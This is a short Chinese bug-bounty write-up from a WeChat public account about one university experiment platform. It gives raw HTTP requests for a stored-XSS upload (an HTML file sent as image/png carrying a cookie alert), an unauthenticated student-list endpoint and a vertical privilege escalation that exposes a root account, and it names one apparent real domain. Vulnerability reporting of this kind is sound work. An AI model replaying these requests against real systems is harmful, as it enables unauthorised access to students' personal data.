声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
http://xxxxxx/login
http://xxxxxxxxxxxxx/guidance/464
http://xxxxx/dialog/content/editor?type=new
http://xxxxxxxx/dialog/content/editor?type=new
在这个上传头上中上传一个数据包,上传一个xss代码
POST /api/static/upload/experiment/file?experimentId=9 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/116.0
Accept: application/json, text/plain,/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------38011060979487556742390084841
Content-Length: 254
Connection: close
-----------------------------38011060979487556742390084841
Content-Disposition: form-data; name="file";
filename="9.html"
Content-Type: image/png
<script>alert(document.cookie)</script>
-----------------------------38011060979487556742390084841--
访问这个网站
http://xxxxxxxxxx/api/static/resources/data/huel-fm/home/20230805091624-9.html
数据还可以
http://huel-fm.digquant.com/login
这里有全校的学生账户信息,
抓这个数据包
POST /api/user/admin/get/list HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept: application/json, text/plain,/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 117
Connection: close
{"experimentId":9,"pageIndex":2,"showItem":10,"collegeName":"","majorName":"","className":"","grade":"","userRole":1}
抓一个包
POST /api/experiment/report/self/newest/info HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/117.0
Accept: application/json, text/plain,/
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 2
Connection: close
{}
替换接口/api/user/admin/get/list
不仅仅是垂直越权成功,还泄露了root账户,其次teacher权限账户,并没有root账户泄露。
就这一站,未授权访问2分+xss 1分+账户2分+越权2分一共拿了七分
技术交流可加下方wx
原文始发于微信公众号(湘安无事):记一次edu单个站点斩获7rank
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论